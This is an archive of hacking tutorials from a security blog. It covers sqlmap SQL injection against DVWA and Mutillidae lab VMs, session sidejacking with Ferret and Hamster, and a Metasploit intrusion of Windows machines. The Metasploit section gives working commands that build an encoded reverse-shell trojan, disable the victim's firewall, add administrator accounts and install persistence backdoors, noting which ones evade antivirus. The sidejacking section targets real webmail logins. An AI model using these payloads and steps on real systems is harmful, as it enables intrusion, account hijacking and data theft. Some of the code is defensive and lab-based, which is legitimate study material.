Sunday, 1 June 2014

SQLMap for post-authentication (after login) URLs



Normally sqlmap is run against URLs that are reachable before login. But what if a SQL injection is suspected in a URL that only appears after login? If you point sqlmap at such a URL without a session, the application answers with an HTTP 302 redirect to the login page and sqlmap never reaches the injectable code. There are several ways to handle this. Below I list almost all the options sqlmap offers, and in the demonstration I show how to use sqlmap on an after-login URL with the --cookie option.
SQLMap is a free and open source tool that detects and exploits SQL injection flaws. It has nifty features that automate detection and exploitation, and it can also fingerprint the database, access the underlying file system and execute SQL commands.
You can download SQLmap from SourceForge here: http://sourceforge.net/projects/sqlmap/
SQLmap Command
Here is the full list of available options:
Options:
1. --version Show program's version number and exit
2. -h, --help Show this help message and exit
3. -v VERBOSE Verbosity level: 0-6 (default 1)
General:
These options can be used to set some general working parameters.
1. -t TRAFFICFILE Log all HTTP traffic into a textual file
2. --batch Never ask for user input, use the default behaviour
3. --charset=CHARSET Force character encoding used for data retrieval
4. --check-tor Check to see if Tor is used properly
5. --crawl=CRAWLDEPTH Crawl the website starting from the target URL
6. --csv-del=CSVDEL Delimiting character used in CSV output (default ",")
7. --eta Display for each output the estimated time of arrival
8. --flush-session Flush session file for current target
9. --forms Parse and test forms on target URL
10. --fresh-queries Ignore query results stored in session file
11. --hex Use DBMS hex function(s) for data retrieval
12. --parse-errors Parse and display DBMS error messages from responses
13. --replicate Replicate dumped data into a sqlite3 database
14. --save Save options to a configuration INI file
15. --tor Use Tor anonymity network
16. --tor-port=TORPORT Set Tor proxy port other than default
17. --tor-type=TORTYPE Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
18. --update Update sqlmap
Target:
These options specify what sqlmap should attack. At least one of them must be given for sqlmap to run.
1. -d DIRECT Direct connection to the database
2. -u URL, --url=URL Target URL
3. -l LOGFILE Parse targets from Burp or WebScarab proxy logs
4. -m BULKFILE Scan multiple targets listed in a given textual file
5. -r REQUESTFILE Load HTTP request from a file
6. -g GOOGLEDORK Process Google dork results as target URLs
7. -c CONFIGFILE Load options from a configuration INI file
Request:
These options specify how to connect to the target URL. For URLs that are only reachable after login, pass the session cookie with --cookie so that sqlmap sends the same authenticated requests the browser does. Alternatively, save a request captured in Burp or ZAP to a text file and load it with -r (see Target above); sqlmap then reuses every header in it, cookie included. --load-cookies reads cookies from a Netscape/wget format cookie file.
1. --data=DATA Data string to be sent through POST
2. --param-del=PDEL Character used for splitting parameter values
3. --cookie=COOKIE HTTP Cookie header
4. --load-cookies=LOC File containing cookies in Netscape/wget format
5. --cookie-urlencode URL encode generated cookie injections
6. --user-agent=AGENT HTTP User-Agent header
7. --random-agent Use randomly selected HTTP User-Agent header
8. --randomize=RPARAM Randomly change value for given parameter(s)
9. --force-ssl Force usage of SSL/HTTPS requests
10. --host=HOST HTTP Host header
11. --referer=REFERER HTTP Referer header
12. --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")
13. --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
14. --auth-cred=ACRED HTTP authentication credentials (name:password)
15. --proxy=PROXY Use a HTTP proxy to connect to the target URL
16. --proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
17. --delay=DELAY Delay in seconds between each HTTP request
18. --skip-urlencode Skip URL encoding of POST data
19. --retries=RETRIES Retries when the connection timeouts (default 3)
20. --scope=SCOPE Regexp to filter targets from provided proxy log
21. --safe-url=SAFURL URL address to visit frequently during testing
22. --safe-freq=SAFREQ Test requests between two visits to a given safe URL
23. --timeout=TIMEOUT Seconds to wait before timeout connection
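The cookie handling described above, as an added example that is not part of the original post and not sqlmap's own code: a small stdlib-only Python script that parses a request saved from Burp (a constructed sample; the host, path and PHPSESSID are the values used later in this walkthrough, not a live session), pulls the Cookie header out of it and builds a correctly quoted sqlmap command line. sqlmap can consume such a file directly with -r; the script makes visible what it extracts, and why the URL has to be quoted when you type the command into a shell.

```python
import shlex
from http.cookies import SimpleCookie

# Constructed sample: the DVWA request from the walkthrough as Burp would save it
# ("Copy to file"). The PHPSESSID is the made-up value from the post, not a live session.
RAW_REQUEST = (
    "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1\r\n"
    "Host: 172.16.221.128\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: security=low; PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and body.
    Header names are lower-cased so lookups do not depend on the proxy's casing."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def session_cookies(req):
    """Return the Cookie header as a name -> value dict, in header order."""
    jar = SimpleCookie()
    jar.load(req["headers"].get("cookie", ""))
    return {name: morsel.value for name, morsel in jar.items()}


def build_sqlmap_argv(req, scheme="http", *extra):
    """Build the sqlmap argument vector for a captured request: -u from the Host
    header and path, --cookie from the Cookie header, --data for a POST body."""
    url = f"{scheme}://{req['headers']['host']}{req['path']}"
    argv = ["sqlmap", "-u", url]
    cookies = session_cookies(req)
    if cookies:
        argv.append("--cookie=" + "; ".join(f"{k}={v}" for k, v in cookies.items()))
    if req["method"] == "POST" and req["body"].strip():
        argv.append("--data=" + req["body"].strip())
    argv.extend(extra)
    return argv


def shell_command(argv):
    """Quote for a POSIX shell: unquoted, the '&' in the query string would put
    sqlmap in the background and everything after '#' would become a comment."""
    return shlex.join(argv)


if __name__ == "__main__":
    req = parse_raw_request(RAW_REQUEST)
    print(shell_command(build_sqlmap_argv(req, "http", "--dbs")))
```

Run it and paste the printed line into a terminal; the single quotes around the URL and the --cookie value are what keep the shell from mangling them.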

Injection:
These options specify which parameters to test, and let you supply custom injection payloads (a prefix and suffix around sqlmap's own payloads) and optional tamper scripts.
1. -p TESTPARAMETER Testable parameter(s)
2. --dbms=DBMS Force back-end DBMS to this value
3. --os=OS Force back-end DBMS operating system to this value
4. --invalid-bignum Use big numbers for invalidating values
5. --invalid-logical Use logical operations for invalidating values
6. --no-cast Turn off payload casting mechanism
7. --prefix=PREFIX Injection payload prefix string
8. --suffix=SUFFIX Injection payload suffix string
9. --skip=SKIP Skip testing for given parameter(s)
10. --tamper=TAMPER Use given script(s) for tampering injection data
Techniques:
These options can be used to tweak testing of specific SQL injection techniques.
1. --technique=TECH SQL injection techniques to test for (default "BEUST": Boolean-based blind, Error-based, UNION query, Stacked queries, Time-based blind)
2. --time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
3. --union-cols=UCOLS Range of columns to test for UNION query SQL injection
4. --union-char=UCHAR Character to use for bruteforcing number of columns
5. --dns-domain=DNAME Domain name used for DNS exfiltration attack
Enumeration:
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.
1. -b, --banner Retrieve DBMS banner
2. --current-user Retrieve DBMS current user
3. --current-db Retrieve DBMS current database
4. --is-dba Detect if the DBMS current user is DBA
5. --users Enumerate DBMS users
6. --passwords Enumerate DBMS users password hashes
7. --privileges Enumerate DBMS users privileges
8. --roles Enumerate DBMS users roles
9. --dbs Enumerate DBMS databases
10. --tables Enumerate DBMS database tables
11. --columns Enumerate DBMS database table columns
12. --schema Enumerate DBMS schema
13. --count Retrieve number of entries for table(s)
14. --dump Dump DBMS database table entries
15. --dump-all Dump all DBMS databases tables entries
16. --search Search column(s), table(s) and/or database name(s)
17. -D DB DBMS database to enumerate
18. -T TBL DBMS database table to enumerate
19. -C COL DBMS database table column to enumerate
20. -U USER DBMS user to enumerate
21. --exclude-sysdbs Exclude DBMS system databases when enumerating tables
22. --start=LIMITSTART First query output entry to retrieve
23. --stop=LIMITSTOP Last query output entry to retrieve
24. --first=FIRSTCHAR First query output word character to retrieve
25. --last=LASTCHAR Last query output word character to retrieve
26. --sql-query=QUERY SQL statement to be executed
27. --sql-shell Prompt for an interactive SQL shell
Windows registry access:
These options can be used to access the back-end database management system Windows registry.
1. --reg-read Read a Windows registry key value
2. --reg-add Write a Windows registry key value data
3. --reg-del Delete a Windows registry key value
4. --reg-key=REGKEY Windows registry key
5. --reg-value=REGVAL Windows registry key value
6. --reg-data=REGDATA Windows registry key value data
7. --reg-type=REGTYPE Windows registry key value type

Miscellaneous:
1. -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
2. --beep Sound alert when SQL injection is found
3. --check-payload Offline WAF/IPS/IDS payload detection testing
4. --check-waf Check for existence of WAF/IPS/IDS protection
5. --cleanup Clean up the DBMS from sqlmap specific UDF and tables
6. --dependencies Check for missing sqlmap dependencies
7. --disable-hash Disable password hash cracking mechanism
8. --disable-like Disable LIKE search of identificator names
9. --gpage=GOOGLEPAGE Use Google dork results from specified page number
10. --mobile Imitate smartphone through HTTP User-Agent header
11. --page-rank Display page rank (PR) for Google dork results
12. --purge-output Safely remove all content from output directory
13. --smart Conduct thorough tests only if positive heuristic(s)
14. --test-filter=TSTF Select tests by payloads and/or titles (e.g. ROW)
15. --wizard Simple wizard interface for beginner users

Demonstration
I am using Kali Linux, on which sqlmap runs beautifully, and a VirtualBox VM running the DVWA application on a Linux-based operating system. http://172.16.221.128/dvwa/ is the URL we are going to attack. The application credentials are:
Username: admin
Password: password

 
After successful login we will navigate to the url:
http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit





If we try sqlmap on the same URL with the command:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs
(quote the URL: left unquoted, the shell treats & as a background operator and # as the start of a comment, so sqlmap would only see id=1 and never get --dbs)

Here --dbs enumerates the databases.
Because we have no session cookie, the application redirects (302) to the login page and sqlmap reports an error like this:


All security analysts and application security testers are familiar with Burp Suite; if you are not, please go through a Burp proxy setup tutorial first. Capture the request in the Burp proxy and note down the cookie values.
 


Here the cookie values are :
security=low;
PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9;
 

Now try sqlmap with this command:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --dbs
Used options:
1. -u: target URL
2. --cookie: the session cookie values copied from Burp
3. --dbs: enumerate DBMS databases

And follow the prompts. The PHPSESSID is only valid while the browser session is alive; if sqlmap starts being redirected to the login page again, log in afresh and update the cookie value.
 

Or you can try the --forms option. The command will be:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/" --forms --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --dbs
Used options:
1. --forms: parse the forms on the page and test their parameters
2. --dbs: enumerate DBMS databases
These two commands give the same result. The output will be like this:



As we can see the list of databases, now let us find the tables in the database dvwa. The command will be:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa --tables
Used options:
1. -D: user-supplied database name
2. --tables: enumerate the tables in the user-supplied database



And the output will be like this.
 


Now, to see what is inside the users table, the command will be:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa -T users --dump
Used options:
1. -T: user-supplied table name
2. --dump: retrieve all the data inside the user-supplied table
 


The output will be like.
 

OK, let's have some more fun.
To find the current database user, try this command:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --current-user
Used options:
--current-user: retrieve the name of the DBMS user the application connects as

This shows the current database user name. The output also contains some more information, like the PHP version, the underlying operating system and the MySQL version. Here the user is root: the web application connects to MySQL as the superuser, so every query the injection runs has root's privileges.
 

The following command enumerates all DBMS users and their password hashes, which can be cracked later for further attacks:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --string="Surname" --users --passwords
Used options:
1. --string: string to match in the page when the query is valid
2. --users: enumerate DBMS users
3. --passwords: enumerate DBMS users' password hashes
Or take the hashes and crack them with a tool such as John the Ripper or any other hash cracker.
I tried John the Ripper on the hash for the username smithy: the password is admin.
Let's have some more fun.
By using the command:
sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --current-user
we learned that the current user is root. Now try to connect with the mysql console:
mysql -h 172.16.221.128 -u root -p
This only works if the MySQL service accepts remote connections from your machine and you have root's password (for example cracked from the hash dumped above).
 


Now we have full access to the database. An attacker can create, update or delete all the records.
 

Wednesday, 28 May 2014

Blind SQL Injection for Forms fields using SqlMap


SQLMAP

Sqlmap is an automatic SQL injection tool written entirely in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specified DBMS tables/columns, run their own SQL SELECT statements, read specific files on the file system, and much more.

Blind SQL Injection for Forms 

Here the vulnerable application is Mutillidae and the attacker system is Kali Linux, which ships with sqlmap. To list all the options available in sqlmap use the command
sqlmap -h
Suppose the login page contains a form with two parameters, username and password.
Then the sqlmap command will be
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms --dbs
Here 172.16.221.129 is the IP of my VirtualBox VM where Mutillidae is hosted.

Here the --forms option is used for the login form: sqlmap automatically identifies how many parameters the form has and tries to exploit each of them.

--dbs enumerates the databases.

After hitting Enter, sqlmap automatically identifies the form parameters and asks whether you want to test this form. Enter y here to continue with the SQL injection test.
sqlmap then asks whether to continue; hit Enter.
Next sqlmap asks what data to use as the form values; by default it fills them with random values. Hit y and Enter.

sqlmap then sends its payloads to detect the SQL injection. If a parameter is vulnerable, sqlmap asks whether you want to exploit it. Hit y and Enter.



If the server answers with something else, such as a 302 redirect, sqlmap asks whether you want to follow it; hit n and Enter.


After finishing the scan, sqlmap shows the list of databases.

As we can see there is a database named mutillidae. Now we have to fetch all the data from this database. With the options -D databasename and --tables we can fetch the table names in the mutillidae database. The sqlmap command is now:
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms -D mutillidae --tables
and follow the same prompts as before. The result is all the tables in the database mutillidae.

Now we have all the tables in the database mutillidae. Next we fetch all the values inside the table accounts. The command will be:
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms -D mutillidae -T accounts --dump
The -T option sets the table name (accounts here) and --dump retrieves all the data inside that table.
The result will be:
Now try to log in with a username and password from the dump. I am trying the username patches and the password tortoise.

Login is successful.

You can also set --threads, --risk and --level; the default for each is 1. --level (1 to 5) and --risk (1 to 3) make sqlmap try more, and more intrusive, payloads, which increases the chance of finding and exploiting an injection at the cost of many more requests. --threads only runs requests in parallel to speed the scan up; it does not change which payloads are tried.
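To make the detection techniques listed under Techniques in the previous post (the B and U of BEUST) and the form-based blind injection in this post concrete, here is an added example; it is not code from the original posts and not sqlmap's own code. It is a Python/sqlite3 model of the DVWA-style vulnerable query next to its parameterised fix, a UNION payload that pulls the user and password columns the way --dump does, and a boolean-based blind extractor that recovers a password hash character by character from nothing but true/false page differences, which is the request pattern a blind login form forces on sqlmap. The table and its rows are constructed sample data (the DVWA default test accounts); unicode() and substr() are SQLite's functions, MySQL would use ASCII() and SUBSTRING().

```python
import sqlite3

# Constructed stand-in for the DVWA "users" table: the DVWA default test
# accounts, reproduced here as sample rows (not a dump from any live system).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                            user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin',  'admin', 'admin',   '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'e99a18c428cb38d5f260853678922e03');
    """)
    return db


def vulnerable_lookup(db, user_id):
    """DVWA 'low' style: the id parameter is pasted straight into the SQL string."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def safe_lookup(db, user_id):
    """Same query with a bound parameter: any payload is just a value that matches nothing."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


def union_dump(db):
    """sqlmap's 'U' technique (what --dump rides on): a UNION that returns the
    columns we want in place of the page's own first_name/last_name columns."""
    payload = "1' UNION SELECT user, password FROM users -- "
    return vulnerable_lookup(db, payload)


def blind_oracle(db):
    """Boolean signal for sqlmap's 'B' technique: True when the injected
    condition keeps the original row on the page, False when the page is empty."""
    def oracle(condition):
        return len(vulnerable_lookup(db, f"1' AND ({condition}) -- ")) > 0
    return oracle


def extract_blind(oracle, expr, max_len=64):
    """Recover the result of the SQL expression `expr` one character at a time
    using only true/false answers, binary-searching each ASCII code.
    Returns (text, number_of_oracle_queries); with --technique=T each query
    would instead cost a --time-sec sleep."""
    result, queries = "", 0
    for pos in range(1, max_len + 1):
        queries += 1
        if not oracle(f"length(({expr})) >= {pos}"):
            break                               # past the end of the string
        lo, hi = 0, 127                         # ASCII range of the unknown character
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result, queries


if __name__ == "__main__":
    db = make_db()
    print("UNION dump:", union_dump(db))
    pw, n = extract_blind(blind_oracle(db), "SELECT password FROM users WHERE user = 'admin'")
    print(f"blind extraction: {pw} in {n} requests")
```

The 7 comparisons per character (a binary search over 128 codes) plus one length probe per position is why a blind dump needs hundreds of requests for a single 32-character hash, and why sqlmap's --threads matters far more for the B and T techniques than for U or E.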

Thursday, 13 February 2014

Hacking into Users account by Side Jacking



Sidejacking is stealing someone's access to a website, typically on public wireless networks. For the attack to work, the application the victim is using must be carried over plain HTTP. The attacker uses a packet sniffer to obtain the unencrypted session cookie that grants access to the application, then impersonates the user by replaying it: the session cookie alone is what the web application checks before serving the user's content.

1) Installing Ferret and Hamster on Ubuntu Linux

sudo su
apt-get install libpcap-dev
Create a folder named sidejack in the root directory:

mkdir /sidejack

cd /sidejack

wget http://www.erratasec.com/erratasec.zip

unzip erratasec.zip

mv hamster hamster2

cd hamster2/build/gcc4

make

cd /sidejack/ferret/build/gcc4

make

cd /sidejack

mkdir hamster

cp /sidejack/ferret/bin/ferret /sidejack/hamster

cp /sidejack/hamster2/bin/favicon.ico /sidejack/hamster

cp /sidejack/hamster2/bin/hamster /sidejack/hamster

cp /sidejack/hamster2/bin/hamster.css /sidejack/hamster

cp /sidejack/hamster2/bin/hamster.js /sidejack/hamster
2) Capture the packets of a web login (webmail such as gmail or hotmail, for example) with Wireshark running in promiscuous mode, and save the capture as test.pcap under /sidejack/hamster2/bin/. The login must travel over plain HTTP; a site that uses HTTPS end to end cannot be sidejacked this way because the cookie never appears in the clear.
3) cd /sidejack/hamster2/bin/
4) ./ferret -r test.pcap (reads the capture and extracts the login names and session cookies)
5) ./hamster (starts the hamster proxy server on http://127.0.0.1:1234)
6) Configure your browser to use the proxy server 127.0.0.1, port 1234.
7) Type http://hamster in your browser.
8) Click the IP address at the bottom of the page that contains the email id or login name the victim logged in with while the packets were being captured.
9) In the right pane you can see several cookies; click one of them to receive the victim's logged-in session. The session is now hijacked and you can do anything inside it that the user could.
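What ferret does with the capture in step 4, as an added example that is not part of the original post and not the Hamster/Ferret code: a stdlib-only Python parser that walks a libpcap file, pulls the TCP payloads out of the Ethernet/IPv4 frames, harvests the Cookie header from every plaintext HTTP request, and also flags Set-Cookie headers a server sent without the Secure attribute, which is exactly the condition that makes sidejacking possible. The capture is constructed in code (made-up addresses, ports and session id) so the example runs offline; a real Wireshark .pcap with the Ethernet link type can be read with the same harvest_cookies() function, pcapng files cannot.

```python
import struct

# Constructed sample traffic (made-up addresses, ports and session id): a
# request carrying a session cookie, the server response that set that cookie
# without the Secure flag, a request with no cookie, and a TLS record the
# parser must ignore.
SAMPLE_FLOWS = [
    ("192.168.1.50", "172.16.221.128", 50000, 80,
     b"GET /dvwa/index.php HTTP/1.1\r\nHost: 172.16.221.128\r\n"
     b"Cookie: security=low; PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9\r\n\r\n"),
    ("172.16.221.128", "192.168.1.50", 80, 50000,
     b"HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; path=/\r\n"
     b"Content-Length: 0\r\n\r\n"),
    ("192.168.1.50", "172.16.221.128", 50001, 80,
     b"GET /dvwa/login.php HTTP/1.1\r\nHost: 172.16.221.128\r\n\r\n"),
    ("192.168.1.50", "10.0.0.9", 50002, 443, b"\x16\x03\x01\x00\x05hello"),
]


def build_pcap(flows):
    """Wrap each (src, dst, sport, dport, payload) into an Ethernet/IPv4/TCP
    frame inside a little-endian libpcap file. MACs, checksums and sequence
    numbers are dummies; this exists only to feed the parser below offline."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for src, dst, sport, dport, payload in flows:
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp        # zero MACs, EtherType IPv4
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap):
    """Yield (src, dst, sport, dport, payload) for every IPv4/TCP frame in a
    classic libpcap file (either byte order, Ethernet link type only)."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == 0xA1B2C3D4 else ">"
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00":
            continue                                  # not IPv4
        ip = frame[14:]
        if ip[9] != 6:
            continue                                  # not TCP
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        yield src, dst, sport, dport, tcp[data_off:]


def harvest_cookies(pcap):
    """Return (cookies_seen, insecure_set_cookies): Cookie headers found in
    plaintext HTTP requests, and Set-Cookie headers a server issued without
    the Secure attribute (the property that lets a sniffer see the cookie)."""
    cookies_seen, insecure = [], []
    for src, dst, sport, dport, data in iter_tcp_payloads(pcap):
        head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        first, *rest = head.split("\r\n")
        hdrs = [(n.strip().lower(), v.strip()) for n, _, v in (l.partition(":") for l in rest)]
        if first.startswith("HTTP/"):                 # a response
            for name, value in hdrs:
                attrs = [a.strip().lower() for a in value.split(";")[1:]]
                if name == "set-cookie" and "secure" not in attrs:
                    insecure.append({"server": src, "port": sport, "set_cookie": value})
        elif " HTTP/" in first:                       # a request
            host = dict(hdrs).get("host", dst)
            for name, value in hdrs:
                if name == "cookie":
                    cookies_seen.append({"client": src, "host": host, "cookie": value})
    return cookies_seen, insecure


if __name__ == "__main__":
    seen, bad = harvest_cookies(build_pcap(SAMPLE_FLOWS))
    for c in seen:
        print(f"{c['client']} -> {c['host']}: Cookie: {c['cookie']}")
    for s in bad:
        print(f"{s['server']}:{s['port']} set a cookie without Secure: {s['set_cookie']}")
```

To run it on a real capture, read the file as bytes (open(path, "rb").read()) and pass it to harvest_cookies(). The insecure_set_cookies list is the defender's view of the same data: every entry is a session the server itself made sniffable.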

Wednesday, 6 February 2013

Hacking Windows 7 x64 and Windows XP x64 using Metasploit

First, I am telling you: don't do this for anything illegal. This tutorial is only for knowledge enhancement; do it at your own risk and don't blame me for anything.

The tool required is Metasploit.

# Here are some examples of the [] placeholders used in the guide below:
# set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So wherever you input something where there is [], remember to remove the []

-------------------------------------

cd /pentest/exploits/framework3/
svn up
# To update framework3
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - how many times it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# If you get an encoder error, find another EXE or encode it fewer times
# Copy the payload to the target

-------------------------------------

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT]
# the same LHOST and LPORT you gave to msfpayload in Shell 1
show options
exploit


----------
# Now we wait for connection, so start the payload on victim computer
----------

use priv
ps
# Look for the PID of explorer.exe
migrate [PID of explorer]
getsystem
sysinfo
# If "Arch = x64", hashdump won't work (the payload above is 32-bit)
# Now we are in the system
-------------------------------------

shell
# Drop to CMD
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming Terminal Services connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Stops blocking incoming Terminal Services connections
Netsh firewall set opmode enable
# Enable the firewall on the victim
Netsh firewall set opmode disable
# Disable the firewall on the victim
net user [USERNAME] [PASSWORD]
# Change the password of an existing user
# Or create your own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# For [GROUP] you could use "administrators"; [USERNAME] is the user you just created
net accounts /maxpwage:[days] | unlimited
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited

# CTRL + Z then Y to background the shell channel and return to meterpreter without hanging the session

-------------------------------------

{Shell 3} (RDP to the compromised system)

# No need for ":" and [PORT] if local
# Remember to be at the "root@bt:~#" prompt
rdesktop [IP]:[port] -u "[USERNAME]"
# back in the meterpreter session:
run metsvc (sets up a backdoor for the next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADDRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to try to connect back every 300 sec. "run persistence -h" for more info
*** UP- AND DOWNSIDES OF EACH ***
METSVC:
VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan; other AVs may do this too!
BAD: If the victim's IP changes you have to know the new IP to connect back
GOOD: Easy to use
GOOD: It doesn't need YOUR IP and port!
PERSISTENCE:
BAD: It needs YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! Only when you run NPE (Norton Power Eraser) is it detected as bad and removed, and that is a tool you must download separately!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc, in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (metsvc listens on this port by default)
set RHOST [VICTIM IP ADDRESS]
show options (check that your setup is correct)
exploit

{GET BACK INTO SYSTEM} (using the persistence backdoor)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT]
# The port set in the persistence backdoor
show options
exploit

----------
# Now we wait for the connection; it will reconnect to your computer within 300 sec
----------

getuid
# If it is "NT AUTHORITY\SYSTEM" do the following; otherwise skip to "use priv":
ps
# Find the PID of explorer.exe
steal_token [NUMBER - PID of explorer]
# From what I know it grants you the same rights as the user running that process
use priv
getsystem
------------------------------------

{Search} (in the meterpreter console)

search -f *.jpg
# Find all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Find all JPG files in a specific folder
search -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (how I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on your BT4 desktop, write anything in it, or nothing, and save it with the name "test.txt". Then, in the meterpreter console (after you are connected to the victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes to check that the path is correct; if it is, type the following:

{Upload}
upload /root/test.txt test.txt
# and if you are uploading a file with a space in its name:
upload "/root/test 2.txt" "test 2.txt"
# Or if you're not in the path where you want the file and want it uploaded to another folder:
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

{Download}
Explanation:
Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, using the "cd", "pwd" and "ls" commands.
Then type:
